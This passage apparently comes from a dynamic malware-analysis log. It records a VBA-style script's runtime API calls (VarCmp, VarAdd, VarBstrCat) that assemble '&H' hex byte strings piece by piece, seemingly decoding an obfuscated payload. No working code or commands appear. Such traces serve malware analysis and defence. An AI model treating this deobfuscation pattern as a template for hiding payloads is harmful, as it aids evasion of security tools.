VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.864] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.864] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.864] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.864] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.864] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.864] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.864] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.864] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.865] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.865] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.865] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.865] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.865] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.865] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.865] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.865] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.865] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.865] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.865] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.865] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.865] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.865] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.866] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.866] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.866] VarBstrCat (in: bstrLeft="&Hc", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.866] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.866] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.866] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.866] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.866] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.866] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.866] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.867] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.867] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.867] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.867] VarBstrCat (in: bstrLeft="&H0", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.867] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.867] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.867] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.867] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.867] VarBstrCat (in: bstrLeft="&H8", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.867] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.868] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.868] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.868] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.868] VarBstrCat (in: bstrLeft="&Hf", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.868] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.868] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.868] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.868] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.868] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.868] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.868] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.869] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.869] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.869] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.869] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.869] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.869] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.869] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.869] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.869] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.869] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.869] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.869] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.869] VarBstrCat (in: bstrLeft="&H0", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.870] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.870] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.870] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.870] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.870] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.870] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.870] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.870] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.870] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.870] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.871] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.871] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.871] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.871] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.871] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.871] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.871] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.871] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.871] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.871] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.871] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.872] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.872] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.872] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.872] VarBstrCat (in: bstrLeft="&Hf", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.872] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.872] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.872] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.872] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.872] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.872] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.873] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.873] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.873] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.873] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.873] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.873] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.873] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.873] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.873] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.873] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.873] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.874] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.874] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.874] VarBstrCat (in: bstrLeft="&Ha", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.874] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.874] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.874] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.874] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.874] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.874] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.874] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.874] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.874] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.875] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.875] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.875] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.875] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.875] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.875] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.875] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.875] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.875] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.875] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.875] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.876] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.876] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.876] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.876] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.876] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.876] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.877] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.877] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.877] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.877] VarBstrCat (in: bstrLeft="&Hd", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.877] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.877] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.877] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.877] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.877] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.877] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.878] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.878] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.878] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.878] VarBstrCat (in: bstrLeft="&Ha", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.878] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.878] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.878] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.878] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.878] VarBstrCat (in: bstrLeft="&Ha", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.878] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.879] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.879] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.879] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.879] VarBstrCat (in: bstrLeft="&Ha", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.879] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.879] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.879] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.879] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.879] VarBstrCat (in: bstrLeft="&Ha", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.879] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.880] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.880] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.880] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.880] VarBstrCat (in: bstrLeft="&Ha", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.880] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.880] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.880] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.880] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.880] VarBstrCat (in: bstrLeft="&Ha", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.880] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.881] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.881] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.881] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.881] VarBstrCat (in: bstrLeft="&Ha", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.881] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.881] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.881] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.881] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.881] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.881] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.881] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.882] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.882] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.882] VarBstrCat (in: bstrLeft="&Hb", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.882] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.882] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.882] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.882] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.882] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.882] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.882] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.882] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.882] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.882] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.883] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.883] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.883] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.883] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.883] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.883] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.883] VarAdd (in: pvarLeft=0x197a34, 